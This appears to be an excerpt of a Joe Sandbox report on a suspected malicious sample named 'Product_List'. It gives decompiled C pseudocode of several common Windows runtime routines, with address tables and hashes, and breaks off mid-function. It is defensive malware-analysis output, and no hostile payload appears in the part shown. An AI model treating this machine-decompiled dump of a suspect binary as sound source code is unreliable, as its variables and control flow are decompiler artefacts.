                                                      0x017fbafc
                                                      0x017fbafe
                                                      0x017fbb01
                                                      0x017fbb01
                                                      0x00000000
                                                      0x017fbb06
                                                      0x017fb9d7
                                                      0x017fb9db
                                                      0x017fb9db
                                                      0x017fb9de
                                                      0x017fb9de
                                                      0x017fb9e4
                                                      0x017fb9e7
                                                      0x017fb9ea
                                                      0x017fb9ec
                                                      0x017fb9ef
                                                      0x017fb9f3
                                                      0x017fba1b
                                                      0x017fba1b
                                                      0x017fba23
                                                      0x017fba24
                                                      0x017fba27
                                                      0x017fba2a
                                                      0x017fba2b
                                                      0x017fba2e
                                                      0x017fba30
                                                      0x017fba37
                                                      0x017fba3f
                                                      0x017fba9c
                                                      0x017fbaa2
                                                      0x017fbb13
                                                      0x017fbb15
                                                      0x017fbaae
                                                      0x017fbaae
                                                      0x017fbab3
                                                      0x017fbab5
                                                      0x017fbaba
                                                      0x017fbac8
                                                      0x017fbac8
                                                      0x017fbaba
                                                      0x017fbacd
                                                      0x017fbacf
                                                      0x00000000
                                                      0x017fbacf
                                                      0x017fbb1a
                                                      0x00000000
                                                      0x017fbb1c
                                                      0x017fbaa7
                                                      0x017fbb11
                                                      0x00000000
                                                      0x017fbb11
                                                      0x017fbaa9
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017fba41
                                                      0x017fba41
                                                      0x017fba41
                                                      0x017fba58
                                                      0x017fba5d
                                                      0x017fba62
                                                      0x00000000
                                                      0x00000000
                                                      0x017fba64
                                                      0x017fba67
                                                      0x017fba68
                                                      0x017fba69
                                                      0x017fba6c
                                                      0x017fba6f
                                                      0x017fba71
                                                      0x017fba78
                                                      0x017fba80
                                                      0x00000000
                                                      0x00000000
                                                      0x017fba90
                                                      0x017fba90
                                                      0x017fba97
                                                      0x00000000
                                                      0x017fba97
                                                      0x017fb9f5
                                                      0x017fb9f7
                                                      0x017fb9f7
                                                      0x017fb9fa
                                                      0x017fba03
                                                      0x017fba07
                                                      0x017fba0c
                                                      0x017fba10
                                                      0x017fba17
                                                      0x00000000
                                                      0x017fb9f7
                                                      0x017fb9a6
                                                      0x017fb9a8
                                                      0x017fb9af
                                                      0x017fb9b3
                                                      0x00000000
                                                      0x00000000
                                                      0x017fb9b9
                                                      0x00000000
                                                      0x017fb9b9
                                                      0x017fb94d
                                                      0x017fb98f
                                                      0x017fb995
                                                      0x017fb999
                                                      0x017fb960
                                                      0x017fb967
                                                      0x017fb968
                                                      0x017fb96a
                                                      0x00000000
                                                      0x017fb96a
                                                      0x017fb99b
                                                      0x017fb99e
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017fb99e
                                                      0x017fb951
                                                      0x017fb954
                                                      0x017fb95a
                                                      0x017fb95e
                                                      0x017fb972
                                                      0x017fb979
                                                      0x017fb97d
                                                      0x017fb97f
                                                      0x017fb980
                                                      0x017fb982
                                                      0x017fb984
                                                      0x00000000
                                                      0x017fb984
                                                      0x00000000
                                                      0x017fb926
                                                      0x00000000
                                                      0x017fb926

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 4be317e0dfa66a306f088522db147a3d6de96d83d0655614d2967a80f25d91f1
                                                      • Instruction ID: 52fd68d3f085ee4e669e94ca1a79653362f39ac6223d035aef7fd094c9711c21
                                                      • Opcode Fuzzy Hash: 4be317e0dfa66a306f088522db147a3d6de96d83d0655614d2967a80f25d91f1
                                                      • Instruction Fuzzy Hash: EB71BB32240606EFE732DE28C849F57FBA5EB84720F24452CE755876A0DB75EA44CB50
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 017652A5 Relevance: .2, Instructions: 161COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 78%
                                                      			E017652A5(char __ecx) {
				char _v20;
				char _v28;
				char _v29;
				void* _v32;
				void* _v36;
				void* _v37;
				void* _v38;
				void* _v40;
				void* _v46;
				void* _v64;
				void* __ebx;
				intOrPtr* _t49;
				signed int _t53;
				short _t85;
				signed int _t87;
				signed int _t88;
				signed int _t89;
				intOrPtr _t101;
				intOrPtr* _t102;
				intOrPtr* _t104;
				signed int _t106;
				void* _t108;

				_t93 = __ecx;
				_t108 = (_t106 & 0xfffffff8) - 0x1c;
				_push(_t88);
				_v29 = __ecx;
				_t89 = _t88 | 0xffffffff;
				while(1) {
					L0177EEF0(0x18579a0);
					_t104 =  *0x1858210; // 0x1242c30
					if(_t104 == 0) {
						break;
					}
					asm("lock inc dword [esi]");
					 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)(_t104 + 8));
					E0177EB70(_t93, 0x18579a0);
					if( *((char*)(_t108 + 0xf)) != 0) {
						_t101 =  *0x7ffe02dc;
						__eflags =  *(_t104 + 0x14) & 0x00000001;
						if(( *(_t104 + 0x14) & 0x00000001) != 0) {
							L9:
							_push(0);
							_push(0);
							_push(0);
							_push(0);
							_push(0x90028);
							_push(_t108 + 0x20);
							_push(0);
							_push(0);
							_push(0);
							_push( *((intOrPtr*)(_t104 + 4)));
							_t53 = E017A9890();
							__eflags = _t53;
							if(_t53 >= 0) {
								__eflags =  *(_t104 + 0x14) & 0x00000001;
								if(( *(_t104 + 0x14) & 0x00000001) == 0) {
									L0177EEF0(0x18579a0);
									 *((intOrPtr*)(_t104 + 8)) = _t101;
									E0177EB70(0, 0x18579a0);
								}
								goto L3;
							}
							__eflags = _t53 - 0xc0000012;
							if(__eflags == 0) {
								L12:
								_t13 = _t104 + 0xc; // 0x1242c3d
								_t93 = _t13;
								 *((char*)(_t108 + 0x12)) = 0;
								__eflags = E0179F0BF(_t13,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								if(__eflags >= 0) {
									L15:
									_t102 = _v28;
									 *_t102 = 2;
									 *((intOrPtr*)(_t108 + 0x18)) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
									L0177EEF0(0x18579a0);
									__eflags =  *0x1858210 - _t104; // 0x1242c30
									if(__eflags == 0) {
										__eflags =  *((char*)(_t108 + 0xe));
										_t95 =  *((intOrPtr*)(_t108 + 0x14));
										 *0x1858210 = _t102;
										_t32 = _t102 + 0xc; // 0x0
										 *_t95 =  *_t32;
										_t33 = _t102 + 0x10; // 0x0
										 *((intOrPtr*)(_t95 + 4)) =  *_t33;
										_t35 = _t102 + 4; // 0xffffffff
										 *((intOrPtr*)(_t95 + 8)) =  *_t35;
										if(__eflags != 0) {
											_t95 =  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10))));
											E017E4888(_t89,  *((intOrPtr*)( *((intOrPtr*)(_t104 + 0x10)))), __eflags);
										}
										E0177EB70(_t95, 0x18579a0);
										asm("lock xadd [esi], eax");
										if(__eflags == 0) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017A95D0();
											L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										asm("lock xadd [esi], ebx");
										__eflags = _t89 == 1;
										if(_t89 == 1) {
											_push( *((intOrPtr*)(_t104 + 4)));
											E017A95D0();
											L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
											_t102 =  *((intOrPtr*)(_t108 + 0x10));
										}
										_t49 = _t102;
										L4:
										return _t49;
									}
									E0177EB70(_t93, 0x18579a0);
									asm("lock xadd [esi], eax");
									if(__eflags == 0) {
										_push( *((intOrPtr*)(_t104 + 4)));
										E017A95D0();
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t104);
										_t102 =  *((intOrPtr*)(_t108 + 0x10));
									}
									 *_t102 = 1;
									asm("lock xadd [edi], eax");
									if(__eflags == 0) {
										_t28 = _t102 + 4; // 0xffffffff
										_push( *_t28);
										E017A95D0();
										L017877F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t102);
									}
									continue;
								}
								_t93 =  &_v20;
								 *((intOrPtr*)(_t108 + 0x20)) =  *((intOrPtr*)(_t104 + 0x10));
								_t85 = 6;
								_v20 = _t85;
								_t87 = E0179F0BF( &_v20,  *(_t104 + 0xe) & 0x0000ffff, __eflags,  &_v28);
								__eflags = _t87;
								if(_t87 < 0) {
									goto L3;
								}
								 *((char*)(_t108 + 0xe)) = 1;
								goto L15;
							}
							__eflags = _t53 - 0xc000026e;
							if(__eflags != 0) {
								goto L3;
							}
							goto L12;
						}
						__eflags = 0x7ffe02dc -  *((intOrPtr*)(_t108 + 0x14));
						if(0x7ffe02dc ==  *((intOrPtr*)(_t108 + 0x14))) {
							goto L3;
						} else {
							goto L9;
						}
					}
					L3:
					_t49 = _t104;
					goto L4;
				}
				_t49 = 0;
				goto L4;
			}

























                                                      0x017652a5
                                                      0x017652ad
                                                      0x017652b0
                                                      0x017652b3
                                                      0x017652b7
                                                      0x017652ba
                                                      0x017652bf
                                                      0x017652c4
                                                      0x017652cc
                                                      0x00000000
                                                      0x00000000
                                                      0x017652ce
                                                      0x017652d9
                                                      0x017652dd
                                                      0x017652e7
                                                      0x017652f7
                                                      0x017652f9
                                                      0x017652fd
                                                      0x017c0dcf
                                                      0x017c0dd5
                                                      0x017c0dd6
                                                      0x017c0dd7
                                                      0x017c0dd8
                                                      0x017c0dd9
                                                      0x017c0dde
                                                      0x017c0ddf
                                                      0x017c0de0
                                                      0x017c0de1
                                                      0x017c0de2
                                                      0x017c0de5
                                                      0x017c0dea
                                                      0x017c0dec
                                                      0x017c0f60
                                                      0x017c0f64
                                                      0x017c0f70
                                                      0x017c0f76
                                                      0x017c0f79
                                                      0x017c0f79
                                                      0x00000000
                                                      0x017c0f64
                                                      0x017c0df2
                                                      0x017c0df7
                                                      0x017c0e04
                                                      0x017c0e0d
                                                      0x017c0e0d
                                                      0x017c0e10
                                                      0x017c0e1a
                                                      0x017c0e1c
                                                      0x017c0e4c
                                                      0x017c0e52
                                                      0x017c0e61
                                                      0x017c0e67
                                                      0x017c0e6b
                                                      0x017c0e70
                                                      0x017c0e76
                                                      0x017c0ed7
                                                      0x017c0edc
                                                      0x017c0ee0
                                                      0x017c0ee6
                                                      0x017c0eea
                                                      0x017c0eed
                                                      0x017c0ef0
                                                      0x017c0ef3
                                                      0x017c0ef6
                                                      0x017c0ef9
                                                      0x017c0efe
                                                      0x017c0f01
                                                      0x017c0f01
                                                      0x017c0f0b
                                                      0x017c0f12
                                                      0x017c0f16
                                                      0x017c0f18
                                                      0x017c0f1b
                                                      0x017c0f2c
                                                      0x017c0f31
                                                      0x017c0f31
                                                      0x017c0f35
                                                      0x017c0f39
                                                      0x017c0f3a
                                                      0x017c0f3c
                                                      0x017c0f3f
                                                      0x017c0f50
                                                      0x017c0f55
                                                      0x017c0f55
                                                      0x017c0f59
                                                      0x017652eb
                                                      0x017652f1
                                                      0x017652f1
                                                      0x017c0e7d
                                                      0x017c0e84
                                                      0x017c0e88
                                                      0x017c0e8a
                                                      0x017c0e8d
                                                      0x017c0e9e
                                                      0x017c0ea3
                                                      0x017c0ea3
                                                      0x017c0ea7
                                                      0x017c0eaf
                                                      0x017c0eb3
                                                      0x017c0eb9
                                                      0x017c0eb9
                                                      0x017c0ebc
                                                      0x017c0ecd
                                                      0x017c0ecd
                                                      0x00000000
                                                      0x017c0eb3
                                                      0x017c0e21
                                                      0x017c0e2b
                                                      0x017c0e2f
                                                      0x017c0e30
                                                      0x017c0e3a
                                                      0x017c0e3f
                                                      0x017c0e41
                                                      0x00000000
                                                      0x00000000
                                                      0x017c0e47
                                                      0x00000000
                                                      0x017c0e47
                                                      0x017c0df9
                                                      0x017c0dfe
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x017c0dfe
                                                      0x01765303
                                                      0x01765307
                                                      0x00000000
                                                      0x01765309
                                                      0x00000000
                                                      0x01765309
                                                      0x01765307
                                                      0x017652e9
                                                      0x017652e9
                                                      0x00000000
                                                      0x017652e9
                                                      0x0176530e
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 1bd5461d7650c705251b1c81f47263f4c833545369d25baea7e67ae81db35638
                                                      • Instruction ID: 20296280ae4f9783197093f29adf5c4ee8cfa97b76eaf42af44b67bc4fc4db92
                                                      • Opcode Fuzzy Hash: 1bd5461d7650c705251b1c81f47263f4c833545369d25baea7e67ae81db35638
                                                      • Instruction Fuzzy Hash: 6A51D970149342AFD721EF28C844B26FBE8FF94B54F10091EF89583651E774E840CBA2
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01792AE4 Relevance: .2, Instructions: 159COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 100%
                                                      			E01792AE4(intOrPtr* __ecx, intOrPtr __edx, signed int _a4, short* _a8, intOrPtr _a12, signed int* _a16) {
				signed short* _v8;
				signed short* _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr* _v28;
				signed int _v32;
				signed int _v36;
				short _t56;
				signed int _t57;
				intOrPtr _t58;
				signed short* _t61;
				intOrPtr _t72;
				intOrPtr _t75;
				intOrPtr _t84;
				intOrPtr _t87;
				intOrPtr* _t90;
				signed short* _t91;
				signed int _t95;
				signed short* _t96;
				intOrPtr _t97;
				intOrPtr _t102;
				signed int _t108;
				intOrPtr _t110;
				signed int _t111;
				signed short* _t112;
				void* _t113;
				signed int _t116;
				signed short** _t119;
				short* _t120;
				signed int _t123;
				signed int _t124;
				void* _t125;
				intOrPtr _t127;
				signed int _t128;

				_t90 = __ecx;
				_v16 = __edx;
				_t108 = _a4;
				_v28 = __ecx;
				_t4 = _t108 - 1; // -1
				if(_t4 > 0x13) {
					L15:
					_t56 = 0xc0000100;
					L16:
					return _t56;
				}
				_t57 = _t108 * 0x1c;
				_v32 = _t57;
				_t6 = _t57 + 0x1858204; // 0x0
				_t123 =  *_t6;
				_t7 = _t57 + 0x1858208; // 0x1858207
				_t8 = _t57 + 0x1858208; // 0x1858207
				_t119 = _t8;
				_v36 = _t123;
				_t110 = _t7 + _t123 * 8;
				_v24 = _t110;
				_t111 = _a4;
				if(_t119 >= _t110) {
					L12:
					if(_t123 != 3) {
						_t58 =  *0x1858450; // 0x0
						if(_t58 == 0) {
							_t58 =  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x48));
						}
					} else {
						_t26 = _t57 + 0x185821c; // 0x0
						_t58 =  *_t26;
					}
					 *_t90 = _t58;
					goto L15;
				} else {
					goto L2;
				}
				while(1) {
					_t116 =  *_t61 & 0x0000ffff;
					_t128 =  *(_t127 + _t61) & 0x0000ffff;
					if(_t116 == _t128) {
						goto L18;
					}
					L5:
					if(_t116 >= 0x61) {
						if(_t116 > 0x7a) {
							_t97 =  *0x1856d5c; // 0x7ff20654
							_t72 =  *0x1856d5c; // 0x7ff20654
							_t75 =  *0x1856d5c; // 0x7ff20654
							_t116 =  *((intOrPtr*)(_t75 + (( *(_t72 + (( *(_t97 + (_t116 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t116 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t116 & 0x0000000f)) * 2)) + _t116 & 0x0000ffff;
						} else {
							_t116 = _t116 - 0x20;
						}
					}
					if(_t128 >= 0x61) {
						if(_t128 > 0x7a) {
							_t102 =  *0x1856d5c; // 0x7ff20654
							_t84 =  *0x1856d5c; // 0x7ff20654
							_t87 =  *0x1856d5c; // 0x7ff20654
							_t128 =  *((intOrPtr*)(_t87 + (( *(_t84 + (( *(_t102 + (_t128 >> 0x00000008 & 0x000000ff) * 2) & 0x0000ffff) + (_t128 >> 0x00000004 & 0x0000000f)) * 2) & 0x0000ffff) + (_t128 & 0x0000000f)) * 2)) + _t128 & 0x0000ffff;
						} else {
							_t128 = _t128 - 0x20;
						}
					}
					if(_t116 == _t128) {
						_t61 = _v12;
						_t96 = _v8;
					} else {
						_t113 = _t116 - _t128;
						L9:
						_t111 = _a4;
						if(_t113 == 0) {
							_t115 =  &(( *_t119)[_t111 + 1]);
							_t33 =  &(_t119[1]); // 0x100
							_t120 = _a8;
							_t95 =  *_t33 -  &(( *_t119)[_t111 + 1]) >> 1;
							_t35 = _t95 - 1; // 0xff
							_t124 = _t35;
							if(_t120 == 0) {
								L27:
								 *_a16 = _t95;
								_t56 = 0xc0000023;
								goto L16;
							}
							if(_t124 >= _a12) {
								if(_a12 >= 1) {
									 *_t120 = 0;
								}
								goto L27;
							}
							 *_a16 = _t124;
							_t125 = _t124 + _t124;
							E017AF3E0(_t120, _t115, _t125);
							_t56 = 0;
							 *((short*)(_t125 + _t120)) = 0;
							goto L16;
						}
						_t119 =  &(_t119[2]);
						if(_t119 < _v24) {
							L2:
							_t91 =  *_t119;
							_t61 = _t91;
							_v12 = _t61;
							_t112 =  &(_t61[_t111]);
							_v8 = _t112;
							if(_t61 >= _t112) {
								break;
							} else {
								_t127 = _v16 - _t91;
								_t96 = _t112;
								_v20 = _t127;
								_t116 =  *_t61 & 0x0000ffff;
								_t128 =  *(_t127 + _t61) & 0x0000ffff;
								if(_t116 == _t128) {
									goto L18;
								}
								goto L5;
							}
						} else {
							_t90 = _v28;
							_t57 = _v32;
							_t123 = _v36;
							goto L12;
						}
					}
					L18:
					_t61 =  &(_t61[1]);
					_v12 = _t61;
					if(_t61 >= _t96) {
						break;
					}
					_t127 = _v20;
				}
				_t113 = 0;
				goto L9;
			}






































                                                      0x01792ae4
                                                      0x01792aec
                                                      0x01792aef
                                                      0x01792af4
                                                      0x01792af7
                                                      0x01792afd
                                                      0x01792b92
                                                      0x01792b92
                                                      0x01792b97
                                                      0x01792b9c
                                                      0x01792b9c
                                                      0x01792b03
                                                      0x01792b06
                                                      0x01792b09
                                                      0x01792b09
                                                      0x01792b0f
                                                      0x01792b15
                                                      0x01792b15
                                                      0x01792b1b
                                                      0x01792b1e
                                                      0x01792b21
                                                      0x01792b26
                                                      0x01792b29
                                                      0x01792b81
                                                      0x01792b84
                                                      0x01792c0e
                                                      0x01792c15
                                                      0x01792c24
                                                      0x01792c24
                                                      0x01792b8a
                                                      0x01792b8a
                                                      0x01792b8a
                                                      0x01792b8a
                                                      0x01792b90
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01792b4a
                                                      0x01792b4a
                                                      0x01792b4d
                                                      0x01792b53
                                                      0x00000000
                                                      0x00000000
                                                      0x01792b55
                                                      0x01792b58
                                                      0x01792bb7
                                                      0x017d5d1b
                                                      0x017d5d37
                                                      0x017d5d47
                                                      0x017d5d53
                                                      0x01792bbd
                                                      0x01792bbd
                                                      0x01792bbd
                                                      0x01792bb7
                                                      0x01792b5d
                                                      0x01792c2f
                                                      0x017d5d5b
                                                      0x017d5d77
                                                      0x017d5d87
                                                      0x017d5d93
                                                      0x01792c35
                                                      0x01792c35
                                                      0x01792c35
                                                      0x01792c2f
                                                      0x01792b65
                                                      0x01792b9f
                                                      0x01792ba2
                                                      0x01792b67
                                                      0x01792b67
                                                      0x01792b69
                                                      0x01792b6b
                                                      0x01792b6e
                                                      0x01792bc9
                                                      0x01792bcc
                                                      0x01792bcf
                                                      0x01792bd4
                                                      0x01792bd6
                                                      0x01792bd6
                                                      0x01792bdb
                                                      0x01792c02
                                                      0x01792c05
                                                      0x01792c07
                                                      0x00000000
                                                      0x01792c07
                                                      0x01792be0
                                                      0x01792c00
                                                      0x01792c3f
                                                      0x01792c3f
                                                      0x00000000
                                                      0x01792c00
                                                      0x01792be5
                                                      0x01792be7
                                                      0x01792bec
                                                      0x01792bf4
                                                      0x01792bf6
                                                      0x00000000
                                                      0x01792bf6
                                                      0x01792b70
                                                      0x01792b76
                                                      0x01792b2b
                                                      0x01792b2b
                                                      0x01792b2d
                                                      0x01792b2f
                                                      0x01792b32
                                                      0x01792b35
                                                      0x01792b3a
                                                      0x00000000
                                                      0x01792b40
                                                      0x01792b43
                                                      0x01792b45
                                                      0x01792b47
                                                      0x01792b4a
                                                      0x01792b4d
                                                      0x01792b53
                                                      0x00000000
                                                      0x00000000
                                                      0x00000000
                                                      0x01792b53
                                                      0x01792b78
                                                      0x01792b78
                                                      0x01792b7b
                                                      0x01792b7e
                                                      0x00000000
                                                      0x01792b7e
                                                      0x01792b76
                                                      0x01792ba5
                                                      0x01792ba5
                                                      0x01792ba8
                                                      0x01792bad
                                                      0x00000000
                                                      0x00000000
                                                      0x01792baf
                                                      0x01792baf
                                                      0x01792bc2
                                                      0x00000000

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: c17ea689bf1baf95b32fb5776f97e2bf30a885890ab307c2877db99668e3dda9
                                                      • Instruction ID: d04e44b235181d9d01809db0ef800c12c490e4fa7050e7357d4c1428195d318d
                                                      • Opcode Fuzzy Hash: c17ea689bf1baf95b32fb5776f97e2bf30a885890ab307c2877db99668e3dda9
                                                      • Instruction Fuzzy Hash: E951BF76A00119DFCF18EF1CD8809BDF7F1FB98700715845AE8469B326E734AA49CB90
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 0178DBE9 Relevance: .1, Instructions: 149COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 86%
                                                      			E0178DBE9(intOrPtr __ecx, intOrPtr __edx, signed int* _a4, intOrPtr _a8, intOrPtr _a12) {
				char _v5;
				signed int _v12;
				signed int* _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				void* __ebx;
				void* __edi;
				signed int _t54;
				char* _t58;
				signed int _t66;
				intOrPtr _t67;
				intOrPtr _t68;
				intOrPtr _t72;
				intOrPtr _t73;
				signed int* _t75;
				intOrPtr _t79;
				intOrPtr _t80;
				char _t82;
				signed int _t83;
				signed int _t84;
				signed int _t88;
				signed int _t89;
				intOrPtr _t90;
				intOrPtr _t92;
				signed int _t97;
				intOrPtr _t98;
				intOrPtr* _t99;
				signed int* _t101;
				signed int* _t102;
				intOrPtr* _t103;
				intOrPtr _t105;
				signed int _t106;
				void* _t118;

				_t92 = __edx;
				_t75 = _a4;
				_t98 = __ecx;
				_v44 = __edx;
				_t106 = _t75[1];
				_v40 = __ecx;
				if(_t106 < 0 || _t106 <= 0 &&  *_t75 < 0) {
					_t82 = 0;
				} else {
					_t82 = 1;
				}
				_v5 = _t82;
				_t6 = _t98 + 0xc8; // 0xc9
				_t101 = _t6;
				 *((intOrPtr*)(_t98 + 0xd4)) = _a12;
				_v16 = _t92 + ((0 | _t82 != 0x00000000) - 0x00000001 & 0x00000048) + 8;
				 *((intOrPtr*)(_t98 + 0xd8)) = _a8;
				if(_t82 != 0) {
					 *(_t98 + 0xde) =  *(_t98 + 0xde) | 0x00000002;
					_t83 =  *_t75;
					_t54 = _t75[1];
					 *_t101 = _t83;
					_t84 = _t83 | _t54;
					_t101[1] = _t54;
					if(_t84 == 0) {
						_t101[1] = _t101[1] & _t84;
						 *_t101 = 1;
					}
					goto L19;
				} else {
					if(_t101 == 0) {
						E0176CC50(E01764510(0xc000000d));
						_t88 =  *_t101;
						_t97 = _t101[1];
						L15:
						_v12 = _t88;
						_t66 = _t88 -  *_t75;
						_t89 = _t97;
						asm("sbb ecx, [ebx+0x4]");
						_t118 = _t89 - _t97;
						if(_t118 <= 0 && (_t118 < 0 || _t66 < _v12)) {
							_t66 = _t66 | 0xffffffff;
							_t89 = 0x7fffffff;
						}
						 *_t101 = _t66;
						_t101[1] = _t89;
						L19:
						if(E01787D50() != 0) {
							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
						} else {
							_t58 = 0x7ffe0386;
						}
						_t102 = _v16;
						if( *_t58 != 0) {
							_t58 = L01838ED6(_t102, _t98);
						}
						_t76 = _v44;
						E01782280(_t58, _v44);
						E0178DD82(_v44, _t102, _t98);
						E0178B944(_t102, _v5);
						return L0177FFB0(_t76, _t98, _t76);
					}
					_t99 = 0x7ffe03b0;
					do {
						_t103 = 0x7ffe0010;
						do {
							_t67 =  *0x1858628; // 0x0
							_v28 = _t67;
							_t68 =  *0x185862c; // 0x0
							_v32 = _t68;
							_v24 =  *((intOrPtr*)(_t99 + 4));
							_v20 =  *_t99;
							while(1) {
								_t97 =  *0x7ffe000c;
								_t90 =  *0x7FFE0008;
								if(_t97 ==  *_t103) {
									goto L10;
								}
								asm("pause");
							}
							L10:
							_t79 = _v24;
							_t99 = 0x7ffe03b0;
							_v12 =  *0x7ffe03b0;
							_t72 =  *0x7FFE03B4;
							_t103 = 0x7ffe0010;
							_v36 = _t72;
						} while (_v20 != _v12 || _t79 != _t72);
						_t73 =  *0x1858628; // 0x0
						_t105 = _v28;
						_t80 =  *0x185862c; // 0x0
					} while (_t105 != _t73 || _v32 != _t80);
					_t98 = _v40;
					asm("sbb edx, [ebp-0x20]");
					_t88 = _t90 - _v12 - _t105;
					_t75 = _a4;
					asm("sbb edx, eax");
					_t31 = _t98 + 0xc8; // 0x182fb53
					_t101 = _t31;
					 *_t101 = _t88;
					_t101[1] = _t97;
					goto L15;
				}
			}









































                                                      0x0178dbe9
                                                      0x0178dbf2
                                                      0x0178dbf7
                                                      0x0178dbf9
                                                      0x0178dbfc
                                                      0x0178dc00
                                                      0x0178dc03
                                                      0x0178dc14
                                                      0x0178dd54
                                                      0x0178dd54
                                                      0x0178dd54
                                                      0x0178dc18
                                                      0x0178dc1d
                                                      0x0178dc1d
                                                      0x0178dc32
                                                      0x0178dc3b
                                                      0x0178dc3e
                                                      0x0178dc46
                                                      0x0178dd5b
                                                      0x0178dd62
                                                      0x0178dd64
                                                      0x0178dd67
                                                      0x0178dd69
                                                      0x0178dd6b
                                                      0x0178dd6e
                                                      0x0178dd70
                                                      0x0178dd73
                                                      0x0178dd73
                                                      0x00000000
                                                      0x0178dc4c
                                                      0x0178dc4e
                                                      0x017d3ae3
                                                      0x017d3ae8
                                                      0x017d3aea
                                                      0x0178dce7
                                                      0x0178dce9
                                                      0x0178dcec
                                                      0x0178dcee
                                                      0x0178dcf0
                                                      0x0178dcf3
                                                      0x0178dcf5
                                                      0x017d3af2
                                                      0x017d3af5
                                                      0x017d3af5
                                                      0x0178dd06
                                                      0x0178dd08
                                                      0x0178dd0b
                                                      0x0178dd12
                                                      0x017d3b08
                                                      0x0178dd18
                                                      0x0178dd18
                                                      0x0178dd18
                                                      0x0178dd20
                                                      0x0178dd23
                                                      0x017d3b16
                                                      0x017d3b16
                                                      0x0178dd29
                                                      0x0178dd2d
                                                      0x0178dd36
                                                      0x0178dd40
                                                      0x0178dd51
                                                      0x0178dd51
                                                      0x0178dc54
                                                      0x0178dc59
                                                      0x0178dc59
                                                      0x0178dc5e
                                                      0x0178dc5e
                                                      0x0178dc63
                                                      0x0178dc66
                                                      0x0178dc6b
                                                      0x0178dc78
                                                      0x0178dc7b
                                                      0x0178dc81
                                                      0x0178dc81
                                                      0x0178dc83
                                                      0x0178dc89
                                                      0x00000000
                                                      0x00000000
                                                      0x0178dd7b
                                                      0x0178dd7b
                                                      0x0178dc8f
                                                      0x0178dc8f
                                                      0x0178dc92
                                                      0x0178dc99
                                                      0x0178dc9f
                                                      0x0178dca5
                                                      0x0178dcaa
                                                      0x0178dcaa
                                                      0x0178dcb3
                                                      0x0178dcb8
                                                      0x0178dcbb
                                                      0x0178dcc1
                                                      0x0178dccf
                                                      0x0178dcd2
                                                      0x0178dcd5
                                                      0x0178dcd7
                                                      0x0178dcda
                                                      0x0178dcdc
                                                      0x0178dcdc
                                                      0x0178dce2
                                                      0x0178dce4
                                                      0x00000000
                                                      0x0178dce4

                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.621527245.0000000001740000.00000040.00001000.00020000.00000000.sdmp, Offset: 01740000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_1740000_Product_List.jbxd
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 03b1808e3d1d028a11b598c17d21f20bcce95de293a75ed6773004d9937ef3ce
                                                      • Instruction ID: 1c350514219813625782358562f1a8987162e654f34be63882024eae649fb258
                                                      • Opcode Fuzzy Hash: 03b1808e3d1d028a11b598c17d21f20bcce95de293a75ed6773004d9937ef3ce
                                                      • Instruction Fuzzy Hash: 4651A271A00206CFCB25DFA8C480AAEFBF1FB49310F24815AD955E7385DB30A984CBA1
                                                      Uniqueness

                                                      Uniqueness Score: -1.00%

                                                      Function 01792990 Relevance: .1, Instructions: 133COMMON
                                                      Download Yara Rule
                                                      C-Code - Quality: 97%
                                                      			E01792990() {
				signed int* _t62;
				signed int _t64;
				intOrPtr _t66;
				signed short* _t69;
				intOrPtr _t76;
				signed short* _t79;
				void* _t81;
				signed int _t82;
				signed short* _t83;
				signed int _t87;
				intOrPtr _t91;
				void* _t98;
				signed int _t99;
				void* _t101;
